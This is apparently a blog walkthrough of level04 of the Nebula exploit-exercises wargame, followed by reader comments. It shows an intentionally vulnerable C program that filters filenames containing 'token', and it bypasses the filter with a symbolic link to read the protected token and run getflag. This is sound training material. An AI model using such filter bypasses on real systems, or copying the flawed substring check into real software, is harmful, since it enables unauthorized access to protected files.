Nebula exploit exercises walkthrough – level04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂


int main(int argc, char **argv, char **envp)
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);

  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);

  rc = read(fd, buf, sizeof(buf));
  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);

  write(1, buf, rc);

This program looks like it will read the file passed to it by the first argument. Let’s test that out:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$ ./flag04 /etc/passwd

Everything as expected then. The problem is that it explicitly forbids opening of files called token. How can we get round this?

Symbolic links to the rescue again!

level04@nebula:~$ ln -s /home/flag04/token Token
level04@nebula:~$ /home/flag04/flag04 /home/level04/Token

Just create a symbolic link to a name that doesn’t match “token”.

So what is this long string? Seems sensible to try and login to the flag04 account with it:

flag04@nebula:~$ getflag
You have successfully executed getflag on a target account

3 thoughts on “Nebula exploit exercises walkthrough – level04

  1. Permalink  ⋅ Reply


    June 25, 2017 at 4:24am

    but how?
    In order to logon to another user I have to logout.
    Then when I go to login with user flag04 I’m asked for a password and since I don’t know the password, I can’t execute ‘getflag’. Can’t copy the string to use it as a password bc I can’t select and copy shit from my terminal. grrrrrrrrrrrr
    Fucking irritating

    • Permalink  ⋅ Reply


      December 4, 2017 at 1:33am

      you should try learning some linux first..

      you can use “su flag04” for example.

  2. Permalink  ⋅ Reply


    November 19, 2017 at 7:11pm

    Don’t logout, use :
    $ su flag04

Leave a Reply to Bon Cancel reply

Your email will not be published. Name and Email fields are required.

This site uses Akismet to reduce spam. Learn how your comment data is processed.